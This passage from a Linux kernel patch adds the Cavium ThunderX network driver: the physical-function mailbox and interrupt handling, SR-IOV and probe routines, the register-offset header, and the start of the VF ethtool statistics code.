Enable backpressure on the channel */ + nic_reg_write(nic, NIC_PF_CHAN_0_255_TX_CFG | (chan << 3), 1); + + tl2 = tl3 >> 2; + nic_reg_write(nic, NIC_PF_TL3A_0_63_CFG | (tl2 << 3), tl2); + nic_reg_write(nic, NIC_PF_TL2_0_63_CFG | (tl2 << 3), rr_quantum); + /* No priorities as of now */ + nic_reg_write(nic, NIC_PF_TL2_0_63_PRI | (tl2 << 3), 0x00); +} + +/* Interrupt handler to handle mailbox messages from VFs */ +static void nic_handle_mbx_intr(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + u64 *mbx_data; + u64 mbx_addr; + u64 reg_addr; + u64 mac_addr; + int bgx, lmac; + int i; + int ret = 0; + + nic->mbx_lock[vf] = true; + + mbx_addr = nic_get_mbx_addr(vf); + mbx_data = (u64 *)&mbx; + + for (i = 0; i < NIC_PF_VF_MAILBOX_SIZE; i++) { + *mbx_data = nic_reg_read(nic, mbx_addr); + mbx_data++; + mbx_addr += sizeof(u64); + } + + dev_dbg(&nic->pdev->dev, "%s: Mailbox msg %d from VF%d\n", + __func__, mbx.msg.msg, vf); + switch (mbx.msg.msg) { + case NIC_MBOX_MSG_READY: + nic_mbx_send_ready(nic, vf); + nic->link[vf] = 0; + nic->duplex[vf] = 0; + nic->speed[vf] = 0; + ret = 1; + break; + case NIC_MBOX_MSG_QS_CFG: + reg_addr = NIC_PF_QSET_0_127_CFG | + (mbx.qs.num << NIC_QS_ID_SHIFT); + nic_reg_write(nic, reg_addr, mbx.qs.cfg); + break; + case NIC_MBOX_MSG_RQ_CFG: + reg_addr = NIC_PF_QSET_0_127_RQ_0_7_CFG | + (mbx.rq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.rq.rq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, reg_addr, mbx.rq.cfg); + break; + case NIC_MBOX_MSG_RQ_BP_CFG: + reg_addr = NIC_PF_QSET_0_127_RQ_0_7_BP_CFG | + (mbx.rq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.rq.rq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, reg_addr, mbx.rq.cfg); + break; + case NIC_MBOX_MSG_RQ_SW_SYNC: + ret = nic_rcv_queue_sw_sync(nic); + break; + case NIC_MBOX_MSG_RQ_DROP_CFG: + reg_addr = NIC_PF_QSET_0_127_RQ_0_7_DROP_CFG | + (mbx.rq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.rq.rq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, reg_addr, mbx.rq.cfg); + break; + case NIC_MBOX_MSG_SQ_CFG: + reg_addr = NIC_PF_QSET_0_127_SQ_0_7_CFG | + (mbx.sq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.sq.sq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, reg_addr, mbx.sq.cfg); + nic_tx_channel_cfg(nic, mbx.qs.num, mbx.sq.sq_num); + break; + case NIC_MBOX_MSG_SET_MAC: + lmac = mbx.mac.vf_id; + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); +#ifdef __BIG_ENDIAN + mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) << 16; +#else + mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) >> 16; +#endif + bgx_set_lmac_mac(nic->node, bgx, lmac, (u8 *)&mac_addr); + break; + case NIC_MBOX_MSG_SET_MAX_FRS: + ret = nic_update_hw_frs(nic, mbx.frs.max_frs, + mbx.frs.vf_id); + break; + case NIC_MBOX_MSG_CPI_CFG: + nic_config_cpi(nic, &mbx.cpi_cfg); + break; + case NIC_MBOX_MSG_RSS_SIZE: + nic_send_rss_size(nic, vf); + goto unlock; + case NIC_MBOX_MSG_RSS_CFG: + case NIC_MBOX_MSG_RSS_CFG_CONT: + nic_config_rss(nic, &mbx.rss_cfg); + break; + case NIC_MBOX_MSG_CFG_DONE: + /* Last message of VF config msg sequence */ + nic->vf_enabled[vf] = true; + goto unlock; + case NIC_MBOX_MSG_SHUTDOWN: + /* First msg in VF teardown sequence */ + nic->vf_enabled[vf] = false; + break; + case NIC_MBOX_MSG_BGX_STATS: + nic_get_bgx_stats(nic, &mbx.bgx_stats); + goto unlock; + default: + dev_err(&nic->pdev->dev, + "Invalid msg from VF%d, msg 0x%x\n", vf, mbx.msg.msg); + break; + } + + if (!ret) + nic_mbx_send_ack(nic, vf); + else if (mbx.msg.msg != NIC_MBOX_MSG_READY) + nic_mbx_send_nack(nic, vf); +unlock: + nic->mbx_lock[vf] = false; +} + +static void nic_mbx_intr_handler (struct nicpf *nic, int mbx) +{ + u64 intr; + u8 vf, vf_per_mbx_reg = 64; + + intr = nic_reg_read(nic, NIC_PF_MAILBOX_INT + (mbx << 3)); + dev_dbg(&nic->pdev->dev, "PF interrupt Mbox%d 0x%llx\n", mbx, intr); + for (vf = 0; vf < vf_per_mbx_reg; vf++) { + if (intr & (1ULL << vf)) { + dev_dbg(&nic->pdev->dev, "Intr from VF %d\n", + vf + (mbx * vf_per_mbx_reg)); + if ((vf + (mbx * vf_per_mbx_reg)) > nic->num_vf_en) + break; + nic_handle_mbx_intr(nic, vf + (mbx * vf_per_mbx_reg)); + nic_clear_mbx_intr(nic, vf, mbx); + } + } +} + +static irqreturn_t nic_mbx0_intr_handler (int irq, void *nic_irq) +{ + struct nicpf *nic = (struct nicpf *)nic_irq; + + nic_mbx_intr_handler(nic, 0); + + return IRQ_HANDLED; +} + +static irqreturn_t nic_mbx1_intr_handler (int irq, void *nic_irq) +{ + struct nicpf *nic = (struct nicpf *)nic_irq; + + nic_mbx_intr_handler(nic, 1); + + return IRQ_HANDLED; +} + +static int nic_enable_msix(struct nicpf *nic) +{ + int i, ret; + + nic->num_vec = NIC_PF_MSIX_VECTORS; + + for (i = 0; i < nic->num_vec; i++) + nic->msix_entries[i].entry = i; + + ret = pci_enable_msix(nic->pdev, nic->msix_entries, nic->num_vec); + if (ret) { + dev_err(&nic->pdev->dev, + "Request for #%d msix vectors failed\n", + nic->num_vec); + return ret; + } + + nic->msix_enabled = 1; + return 0; +} + +static void nic_disable_msix(struct nicpf *nic) +{ + if (nic->msix_enabled) { + pci_disable_msix(nic->pdev); + nic->msix_enabled = 0; + nic->num_vec = 0; + } +} + +static void nic_free_all_interrupts(struct nicpf *nic) +{ + int irq; + + for (irq = 0; irq < nic->num_vec; irq++) { + if (nic->irq_allocated[irq]) + free_irq(nic->msix_entries[irq].vector, nic); + nic->irq_allocated[irq] = false; + } +} + +static int nic_register_interrupts(struct nicpf *nic) +{ + int ret; + + /* Enable MSI-X */ + ret = nic_enable_msix(nic); + if (ret) + return ret; + + /* Register mailbox interrupt handlers */ + ret = request_irq(nic->msix_entries[NIC_PF_INTR_ID_MBOX0].vector, + nic_mbx0_intr_handler, 0, "NIC Mbox0", nic); + if (ret) + goto fail; + + nic->irq_allocated[NIC_PF_INTR_ID_MBOX0] = true; + + ret = request_irq(nic->msix_entries[NIC_PF_INTR_ID_MBOX1].vector, + nic_mbx1_intr_handler, 0, "NIC Mbox1", nic); + if (ret) + goto fail; + + nic->irq_allocated[NIC_PF_INTR_ID_MBOX1] = true; + + /* Enable mailbox interrupt */ + nic_enable_mbx_intr(nic); + return 0; + +fail: + dev_err(&nic->pdev->dev, "Request irq failed\n"); + nic_free_all_interrupts(nic); + return ret; +} + +static void nic_unregister_interrupts(struct nicpf *nic) +{ + nic_free_all_interrupts(nic); + nic_disable_msix(nic); +} + +static int nic_sriov_init(struct pci_dev *pdev, struct nicpf *nic) +{ + int pos = 0; + int err; + u16 total_vf_cnt; + + pos = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_SRIOV); + if (!pos) { + dev_err(&pdev->dev, "SRIOV capability is not found in PCIe config space\n"); + return -ENODEV; + } + + pci_read_config_word(pdev, (pos + PCI_SRIOV_TOTAL_VF), &total_vf_cnt); + if (total_vf_cnt < nic->num_vf_en) + nic->num_vf_en = total_vf_cnt; + + if (!total_vf_cnt) + return 0; + + err = pci_enable_sriov(pdev, nic->num_vf_en); + if (err) { + dev_err(&pdev->dev, "SRIOV enable failed, num VF is %d\n", + nic->num_vf_en); + nic->num_vf_en = 0; + return err; + } + + dev_info(&pdev->dev, "SRIOV enabled, number of VF available %d\n", + nic->num_vf_en); + + nic->flags |= NIC_SRIOV_ENABLED; + return 0; +} + +/* Poll for BGX LMAC link status and update corresponding VF + * if there is a change, valid only if internal L2 switch + * is not present otherwise VF link is always treated as up + */ +static void nic_poll_for_link(struct work_struct *work) +{ + union nic_mbx mbx = {}; + struct nicpf *nic; + struct bgx_link_status link; + u8 vf, bgx, lmac; + + nic = container_of(work, struct nicpf, dwork.work); + + mbx.link_status.msg = NIC_MBOX_MSG_BGX_LINK_CHANGE; + + for (vf = 0; vf < nic->num_vf_en; vf++) { + /* Poll only if VF is UP */ + if (!nic->vf_enabled[vf]) + continue; + + /* Get BGX, LMAC indices for the VF */ + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + /* Get interface link status */ + bgx_get_lmac_link_state(nic->node, bgx, lmac, &link); + + /* Inform VF only if link status changed */ + if (nic->link[vf] == link.link_up) + continue; + + if (!nic->mbx_lock[vf]) { + nic->link[vf] = link.link_up; + nic->duplex[vf] = link.duplex; + nic->speed[vf] = link.speed; + + /* Send a mbox message to VF with current link status */ + mbx.link_status.link_up = link.link_up; + mbx.link_status.duplex = link.duplex; + mbx.link_status.speed = link.speed; + nic_send_msg_to_vf(nic, vf, &mbx); + } + } + queue_delayed_work(nic->check_link, &nic->dwork, HZ * 2); +} + +static int nic_probe(struct pci_dev *pdev, const struct pci_device_id *ent) +{ + struct device *dev = &pdev->dev; + struct nicpf *nic; + int err; + + BUILD_BUG_ON(sizeof(union nic_mbx) > 16); + + nic = devm_kzalloc(dev, sizeof(*nic), GFP_KERNEL); + if (!nic) + return -ENOMEM; + + pci_set_drvdata(pdev, nic); + + nic->pdev = pdev; + + err = pci_enable_device(pdev); + if (err) { + dev_err(dev, "Failed to enable PCI device\n"); + pci_set_drvdata(pdev, NULL); + return err; + } + + err = pci_request_regions(pdev, DRV_NAME); + if (err) { + dev_err(dev, "PCI request regions failed 0x%x\n", err); + goto err_disable_device; + } + + err = pci_set_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "Unable to get usable DMA configuration\n"); + goto err_release_regions; + } + + err = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "Unable to get 48-bit DMA for consistent allocations\n"); + goto err_release_regions; + } + + /* MAP PF's configuration registers */ + nic->reg_base = pcim_iomap(pdev, PCI_CFG_REG_BAR_NUM, 0); + if (!nic->reg_base) { + dev_err(dev, "Cannot map config register space, aborting\n"); + err = -ENOMEM; + goto err_release_regions; + } + + pci_read_config_byte(pdev, PCI_REVISION_ID, &nic->rev_id); + + nic->node = NIC_NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)); + + nic_set_lmac_vf_mapping(nic); + + /* Initialize hardware */ + nic_init_hw(nic); + + /* Set RSS TBL size for each VF */ + nic->rss_ind_tbl_size = NIC_MAX_RSS_IDR_TBL_SIZE; + + /* Register interrupts */ + err = nic_register_interrupts(nic); + if (err) + goto err_release_regions; + + /* Configure SRIOV */ + err = nic_sriov_init(pdev, nic); + if (err) + goto err_unregister_interrupts; + + /* Register a physical link status poll fn() */ + nic->check_link = alloc_workqueue("check_link_status", + WQ_UNBOUND | WQ_MEM_RECLAIM, 1); + if (!nic->check_link) { + err = -ENOMEM; + goto err_disable_sriov; + } + + INIT_DELAYED_WORK(&nic->dwork, nic_poll_for_link); + queue_delayed_work(nic->check_link, &nic->dwork, 0); + + return 0; + +err_disable_sriov: + if (nic->flags & NIC_SRIOV_ENABLED) + pci_disable_sriov(pdev); +err_unregister_interrupts: + nic_unregister_interrupts(nic); +err_release_regions: + pci_release_regions(pdev); +err_disable_device: + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); + return err; +} + +static void nic_remove(struct pci_dev *pdev) +{ + struct nicpf *nic = pci_get_drvdata(pdev); + + if (nic->flags & NIC_SRIOV_ENABLED) + pci_disable_sriov(pdev); + + if (nic->check_link) { + /* Destroy work Queue */ + cancel_delayed_work(&nic->dwork); + flush_workqueue(nic->check_link); + destroy_workqueue(nic->check_link); + } + + nic_unregister_interrupts(nic); + pci_release_regions(pdev); + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); +} + +static struct pci_driver nic_driver = { + .name = DRV_NAME, + .id_table = nic_id_table, + .probe = nic_probe, + .remove = nic_remove, +}; + +static int __init nic_init_module(void) +{ + pr_info("%s, ver %s\n", DRV_NAME, DRV_VERSION); + + return pci_register_driver(&nic_driver); +} + +static void __exit nic_cleanup_module(void) +{ + pci_unregister_driver(&nic_driver); +} + +module_init(nic_init_module); +module_exit(nic_cleanup_module); diff --git a/drivers/net/ethernet/cavium/thunder/nic_reg.h b/drivers/net/ethernet/cavium/thunder/nic_reg.h new file mode 100644 index 000000000000..58197bb2f805 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nic_reg.h @@ -0,0 +1,213 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef NIC_REG_H +#define NIC_REG_H + +#define NIC_PF_REG_COUNT 29573 +#define NIC_VF_REG_COUNT 249 + +/* Physical function register offsets */ +#define NIC_PF_CFG (0x0000) +#define NIC_PF_STATUS (0x0010) +#define NIC_PF_INTR_TIMER_CFG (0x0030) +#define NIC_PF_BIST_STATUS (0x0040) +#define NIC_PF_SOFT_RESET (0x0050) +#define NIC_PF_TCP_TIMER (0x0060) +#define NIC_PF_BP_CFG (0x0080) +#define NIC_PF_RRM_CFG (0x0088) +#define NIC_PF_CQM_CF (0x00A0) +#define NIC_PF_CNM_CF (0x00A8) +#define NIC_PF_CNM_STATUS (0x00B0) +#define NIC_PF_CQ_AVG_CFG (0x00C0) +#define NIC_PF_RRM_AVG_CFG (0x00C8) +#define NIC_PF_INTF_0_1_SEND_CFG (0x0200) +#define NIC_PF_INTF_0_1_BP_CFG (0x0208) +#define NIC_PF_INTF_0_1_BP_DIS_0_1 (0x0210) +#define NIC_PF_INTF_0_1_BP_SW_0_1 (0x0220) +#define NIC_PF_RBDR_BP_STATE_0_3 (0x0240) +#define NIC_PF_MAILBOX_INT (0x0410) +#define NIC_PF_MAILBOX_INT_W1S (0x0430) +#define NIC_PF_MAILBOX_ENA_W1C (0x0450) +#define NIC_PF_MAILBOX_ENA_W1S (0x0470) +#define NIC_PF_RX_ETYPE_0_7 (0x0500) +#define NIC_PF_PKIND_0_15_CFG (0x0600) +#define NIC_PF_ECC0_FLIP0 (0x1000) +#define NIC_PF_ECC1_FLIP0 (0x1008) +#define NIC_PF_ECC2_FLIP0 (0x1010) +#define NIC_PF_ECC3_FLIP0 (0x1018) +#define NIC_PF_ECC0_FLIP1 (0x1080) +#define NIC_PF_ECC1_FLIP1 (0x1088) +#define NIC_PF_ECC2_FLIP1 (0x1090) +#define NIC_PF_ECC3_FLIP1 (0x1098) +#define NIC_PF_ECC0_CDIS (0x1100) +#define NIC_PF_ECC1_CDIS (0x1108) +#define NIC_PF_ECC2_CDIS (0x1110) +#define NIC_PF_ECC3_CDIS (0x1118) +#define NIC_PF_BIST0_STATUS (0x1280) +#define NIC_PF_BIST1_STATUS (0x1288) +#define NIC_PF_BIST2_STATUS (0x1290) +#define NIC_PF_BIST3_STATUS (0x1298) +#define NIC_PF_ECC0_SBE_INT (0x2000) +#define NIC_PF_ECC0_SBE_INT_W1S (0x2008) +#define NIC_PF_ECC0_SBE_ENA_W1C (0x2010) +#define NIC_PF_ECC0_SBE_ENA_W1S (0x2018) +#define NIC_PF_ECC0_DBE_INT (0x2100) +#define NIC_PF_ECC0_DBE_INT_W1S (0x2108) +#define NIC_PF_ECC0_DBE_ENA_W1C (0x2110) +#define NIC_PF_ECC0_DBE_ENA_W1S (0x2118) +#define NIC_PF_ECC1_SBE_INT (0x2200) +#define NIC_PF_ECC1_SBE_INT_W1S (0x2208) +#define NIC_PF_ECC1_SBE_ENA_W1C (0x2210) +#define NIC_PF_ECC1_SBE_ENA_W1S (0x2218) +#define NIC_PF_ECC1_DBE_INT (0x2300) +#define NIC_PF_ECC1_DBE_INT_W1S (0x2308) +#define NIC_PF_ECC1_DBE_ENA_W1C (0x2310) +#define NIC_PF_ECC1_DBE_ENA_W1S (0x2318) +#define NIC_PF_ECC2_SBE_INT (0x2400) +#define NIC_PF_ECC2_SBE_INT_W1S (0x2408) +#define NIC_PF_ECC2_SBE_ENA_W1C (0x2410) +#define NIC_PF_ECC2_SBE_ENA_W1S (0x2418) +#define NIC_PF_ECC2_DBE_INT (0x2500) +#define NIC_PF_ECC2_DBE_INT_W1S (0x2508) +#define NIC_PF_ECC2_DBE_ENA_W1C (0x2510) +#define NIC_PF_ECC2_DBE_ENA_W1S (0x2518) +#define NIC_PF_ECC3_SBE_INT (0x2600) +#define NIC_PF_ECC3_SBE_INT_W1S (0x2608) +#define NIC_PF_ECC3_SBE_ENA_W1C (0x2610) +#define NIC_PF_ECC3_SBE_ENA_W1S (0x2618) +#define NIC_PF_ECC3_DBE_INT (0x2700) +#define NIC_PF_ECC3_DBE_INT_W1S (0x2708) +#define NIC_PF_ECC3_DBE_ENA_W1C (0x2710) +#define NIC_PF_ECC3_DBE_ENA_W1S (0x2718) +#define NIC_PF_CPI_0_2047_CFG (0x200000) +#define NIC_PF_RSSI_0_4097_RQ (0x220000) +#define NIC_PF_LMAC_0_7_CFG (0x240000) +#define NIC_PF_LMAC_0_7_SW_XOFF (0x242000) +#define NIC_PF_LMAC_0_7_CREDIT (0x244000) +#define NIC_PF_CHAN_0_255_TX_CFG (0x400000) +#define NIC_PF_CHAN_0_255_RX_CFG (0x420000) +#define NIC_PF_CHAN_0_255_SW_XOFF (0x440000) +#define NIC_PF_CHAN_0_255_CREDIT (0x460000) +#define NIC_PF_CHAN_0_255_RX_BP_CFG (0x480000) +#define NIC_PF_SW_SYNC_RX (0x490000) +#define NIC_PF_SW_SYNC_RX_DONE (0x490008) +#define NIC_PF_TL2_0_63_CFG (0x500000) +#define NIC_PF_TL2_0_63_PRI (0x520000) +#define NIC_PF_TL2_0_63_SH_STATUS (0x580000) +#define NIC_PF_TL3A_0_63_CFG (0x5F0000) +#define NIC_PF_TL3_0_255_CFG (0x600000) +#define NIC_PF_TL3_0_255_CHAN (0x620000) +#define NIC_PF_TL3_0_255_PIR (0x640000) +#define NIC_PF_TL3_0_255_SW_XOFF (0x660000) +#define NIC_PF_TL3_0_255_CNM_RATE (0x680000) +#define NIC_PF_TL3_0_255_SH_STATUS (0x6A0000) +#define NIC_PF_TL4A_0_255_CFG (0x6F0000) +#define NIC_PF_TL4_0_1023_CFG (0x800000) +#define NIC_PF_TL4_0_1023_SW_XOFF (0x820000) +#define NIC_PF_TL4_0_1023_SH_STATUS (0x840000) +#define NIC_PF_TL4A_0_1023_CNM_RATE (0x880000) +#define NIC_PF_TL4A_0_1023_CNM_STATUS (0x8A0000) +#define NIC_PF_VF_0_127_MAILBOX_0_1 (0x20002030) +#define NIC_PF_VNIC_0_127_TX_STAT_0_4 (0x20004000) +#define NIC_PF_VNIC_0_127_RX_STAT_0_13 (0x20004100) +#define NIC_PF_QSET_0_127_LOCK_0_15 (0x20006000) +#define NIC_PF_QSET_0_127_CFG (0x20010000) +#define NIC_PF_QSET_0_127_RQ_0_7_CFG (0x20010400) +#define NIC_PF_QSET_0_127_RQ_0_7_DROP_CFG (0x20010420) +#define NIC_PF_QSET_0_127_RQ_0_7_BP_CFG (0x20010500) +#define NIC_PF_QSET_0_127_RQ_0_7_STAT_0_1 (0x20010600) +#define NIC_PF_QSET_0_127_SQ_0_7_CFG (0x20010C00) +#define NIC_PF_QSET_0_127_SQ_0_7_CFG2 (0x20010C08) +#define NIC_PF_QSET_0_127_SQ_0_7_STAT_0_1 (0x20010D00) + +#define NIC_PF_MSIX_VEC_0_18_ADDR (0x000000) +#define NIC_PF_MSIX_VEC_0_CTL (0x000008) +#define NIC_PF_MSIX_PBA_0 (0x0F0000) + +/* Virtual function register offsets */ +#define NIC_VNIC_CFG (0x000020) +#define NIC_VF_PF_MAILBOX_0_1 (0x000130) +#define NIC_VF_INT (0x000200) +#define NIC_VF_INT_W1S (0x000220) +#define NIC_VF_ENA_W1C (0x000240) +#define NIC_VF_ENA_W1S (0x000260) + +#define NIC_VNIC_RSS_CFG (0x0020E0) +#define NIC_VNIC_RSS_KEY_0_4 (0x002200) +#define NIC_VNIC_TX_STAT_0_4 (0x004000) +#define NIC_VNIC_RX_STAT_0_13 (0x004100) +#define NIC_QSET_RQ_GEN_CFG (0x010010) + +#define NIC_QSET_CQ_0_7_CFG (0x010400) +#define NIC_QSET_CQ_0_7_CFG2 (0x010408) +#define NIC_QSET_CQ_0_7_THRESH (0x010410) +#define NIC_QSET_CQ_0_7_BASE (0x010420) +#define NIC_QSET_CQ_0_7_HEAD (0x010428) +#define NIC_QSET_CQ_0_7_TAIL (0x010430) +#define NIC_QSET_CQ_0_7_DOOR (0x010438) +#define NIC_QSET_CQ_0_7_STATUS (0x010440) +#define NIC_QSET_CQ_0_7_STATUS2 (0x010448) +#define NIC_QSET_CQ_0_7_DEBUG (0x010450) + +#define NIC_QSET_RQ_0_7_CFG (0x010600) +#define NIC_QSET_RQ_0_7_STAT_0_1 (0x010700) + +#define NIC_QSET_SQ_0_7_CFG (0x010800) +#define NIC_QSET_SQ_0_7_THRESH (0x010810) +#define NIC_QSET_SQ_0_7_BASE (0x010820) +#define NIC_QSET_SQ_0_7_HEAD (0x010828) +#define NIC_QSET_SQ_0_7_TAIL (0x010830) +#define NIC_QSET_SQ_0_7_DOOR (0x010838) +#define NIC_QSET_SQ_0_7_STATUS (0x010840) +#define NIC_QSET_SQ_0_7_DEBUG (0x010848) +#define NIC_QSET_SQ_0_7_CNM_CHG (0x010860) +#define NIC_QSET_SQ_0_7_STAT_0_1 (0x010900) + +#define NIC_QSET_RBDR_0_1_CFG (0x010C00) +#define NIC_QSET_RBDR_0_1_THRESH (0x010C10) +#define NIC_QSET_RBDR_0_1_BASE (0x010C20) +#define NIC_QSET_RBDR_0_1_HEAD (0x010C28) +#define NIC_QSET_RBDR_0_1_TAIL (0x010C30) +#define NIC_QSET_RBDR_0_1_DOOR (0x010C38) +#define NIC_QSET_RBDR_0_1_STATUS0 (0x010C40) +#define NIC_QSET_RBDR_0_1_STATUS1 (0x010C48) +#define NIC_QSET_RBDR_0_1_PREFETCH_STATUS (0x010C50) + +#define NIC_VF_MSIX_VECTOR_0_19_ADDR (0x000000) +#define NIC_VF_MSIX_VECTOR_0_19_CTL (0x000008) +#define NIC_VF_MSIX_PBA (0x0F0000) + +/* Offsets within registers */ +#define NIC_MSIX_VEC_SHIFT 4 +#define NIC_Q_NUM_SHIFT 18 +#define NIC_QS_ID_SHIFT 21 +#define NIC_VF_NUM_SHIFT 21 + +/* Port kind configuration register */ +struct pkind_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_42_63:22; + u64 hdr_sl:5; /* Header skip length */ + u64 rx_hdr:3; /* TNS Receive header present */ + u64 lenerr_en:1;/* L2 length error check enable */ + u64 reserved_32_32:1; + u64 maxlen:16; /* Max frame size */ + u64 minlen:16; /* Min frame size */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 minlen:16; + u64 maxlen:16; + u64 reserved_32_32:1; + u64 lenerr_en:1; + u64 rx_hdr:3; + u64 hdr_sl:5; + u64 reserved_42_63:22; +#endif +}; + +#endif /* NIC_REG_H */ diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c new file mode 100644 index 000000000000..0fc4a536afc9 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c @@ -0,0 +1,601 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +/* ETHTOOL Support for VNIC_VF Device*/ + +#include + +#include "nic_reg.h" +#include "nic.h" +#include "nicvf_queues.h" +#include "q_struct.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-nicvf" +#define DRV_VERSION "1.0" + +struct nicvf_stat { + char name[ETH_GSTRING_LEN]; + unsigned int index; +}; + +#define NICVF_HW_STAT(stat) { \ + .name = #stat, \ + .index = offsetof(struct nicvf_hw_stats, stat) / sizeof(u64), \ +} + +#define NICVF_DRV_STAT(stat) { \ + .name = #stat, \ + .index = offsetof(struct nicvf_drv_stats, stat) / sizeof(u64), \ +} + +static const struct nicvf_stat nicvf_hw_stats[] = { + NICVF_HW_STAT(rx_bytes_ok), + NICVF_HW_STAT(rx_ucast_frames_ok), + NICVF_HW_STAT(rx_bcast_frames_ok), + NICVF_HW_STAT(rx_mcast_frames_ok), + NICVF_HW_STAT(rx_fcs_errors), + NICVF_HW_STAT(rx_l2_errors), + NICVF_HW_STAT(rx_drop_red), + NICVF_HW_STAT(rx_drop_red_bytes), + NICVF_HW_STAT(rx_drop_overrun), + NICVF_HW_STAT(rx_drop_overrun_bytes), + NICVF_HW_STAT(rx_drop_bcast), + NICVF_HW_STAT(rx_drop_mcast), + NICVF_HW_STAT(rx_drop_l3_bcast), + NICVF_HW_STAT(rx_drop_l3_mcast), + NICVF_HW_STAT(tx_bytes_ok), + NICVF_HW_STAT(tx_ucast_frames_ok), + NICVF_HW_STAT(tx_bcast_frames_ok), + NICVF_HW_STAT(tx_mcast_frames_ok), +}; + +static const struct nicvf_stat nicvf_drv_stats[] = { + NICVF_DRV_STAT(rx_frames_ok), + NICVF_DRV_STAT(rx_frames_64), + NICVF_DRV_STAT(rx_frames_127), + NICVF_DRV_STAT(rx_frames_255), + NICVF_DRV_STAT(rx_frames_511), + NICVF_DRV_STAT(rx_frames_1023), + NICVF_DRV_STAT(rx_frames_1518), + NICVF_DRV_STAT(rx_frames_jumbo), + NICVF_DRV_STAT(rx_drops), + NICVF_DRV_STAT(tx_frames_ok), + NICVF_DRV_STAT(tx_busy), + NICVF_DRV_STAT(tx_tso), + NICVF_DRV_STAT(tx_drops), +}; + +static const struct nicvf_stat nicvf_queue_stats[] = { + { "bytes", 0 }, + { "frames", 1 }, +}; + +static const unsigned int nicvf_n_hw_stats = ARRAY_SIZE(nicvf_hw_stats); +static const unsigned int nicvf_n_drv_stats = ARRAY_SIZE(nicvf_drv_stats); +static const unsigned int nicvf_n_queue_stats = ARRAY_SIZE(nicvf_queue_stats); + +static int nicvf_get_settings(struct net_device *netdev, + struct ethtool_cmd *cmd) +{ + struct nicvf *nic = netdev_priv(netdev); + + cmd->supported = 0; + cmd->transceiver = XCVR_EXTERNAL; + if (nic->speed <= 1000) { + cmd->port = PORT_MII; + cmd->autoneg = AUTONEG_ENABLE; + } else { + cmd->port = PORT_FIBRE; + cmd->autoneg = AUTONEG_DISABLE; + } + cmd->duplex = nic->duplex; + ethtool_cmd_speed_set(cmd, nic->speed); + + return 0; +} + +static void nicvf_get_drvinfo(struct net_device *netdev, + struct ethtool_drvinfo *info) +{ + struct nicvf *nic = netdev_priv(netdev); + + strlcpy(info->driver, DRV_NAME, sizeof(info->driver)); + strlcpy(info->version, DRV_VERSION, sizeof(info->version)); + strlcpy(info->bus_info, pci_name(nic->pdev), sizeof(info->bus_info)); +} + +static u32 nicvf_get_msglevel(struct net_device *netdev) +{ + struct nicvf *nic = netdev_priv(netdev); + + return nic->msg_enable; +} + +static void nicvf_set_msglevel(struct net_device *netdev, u32 lvl) +{ + struct nicvf *nic = netdev_priv(netdev); + + nic->msg_enable = lvl; +} + +static void nicvf_get_strings(struct net_device *netdev, u32 sset, u8 *data) +{ + int stats, qidx; + + if (sset != ETH_SS_STATS) + return; + + for (stats = 0; stats < nicvf_n_hw_stats; stats++) { + memcpy(data, nicvf_hw_stats[stats].name, ETH_GSTRING_LEN); + data += ETH_GSTRING_LEN; + } + + for (stats = 0; stats < nicvf_n_drv_stats; stats++) { + memcpy(data, nicvf_drv_stats[stats].name, ETH_GSTRING_LEN); + data += ETH_GSTRING_LEN; + } + + for (qidx = 0; qidx < MAX_RCV_QUEUES_PER_QS; qidx++) { + for (stats = 0; stats < nicvf_n_queue_stats; stats++) { + sprintf(data, "rxq%d: %s", qidx, + nicvf_queue_stats[stats].name); + data += ETH_GSTRING_LEN; + } + } + + for (qidx = 0; qidx < MAX_SND_QUEUES_PER_QS; qidx++) { + for (stats = 0; stats < nicvf_n_queue_stats; stats++) { + sprintf(data, "txq%d: %s", qidx, + nicvf_queue_stats[stats].name); + data += ETH_GSTRING_LEN; + } + } + + for (stats = 0; stats < BGX_RX_STATS_COUNT; stats++) { + sprintf(data, "bgx_rxstat%d: ", stats); + data += ETH_GSTRING_LEN; + } + + for (stats = 0; stats < BGX_TX_STATS_COUNT; stats++) { + sprintf(data, "bgx_txstat%d: ", stats); + data += ETH_GSTRING_LEN; + } +} + +static int nicvf_get_sset_count(struct net_device *netdev, int sset) +{ + if (sset != ETH_SS_STATS) + return -EINVAL; + + return nicvf_n_hw_stats + nicvf_n_drv_stats + + (nicvf_n_queue_stats * + (MAX_RCV_QUEUES_PER_QS + 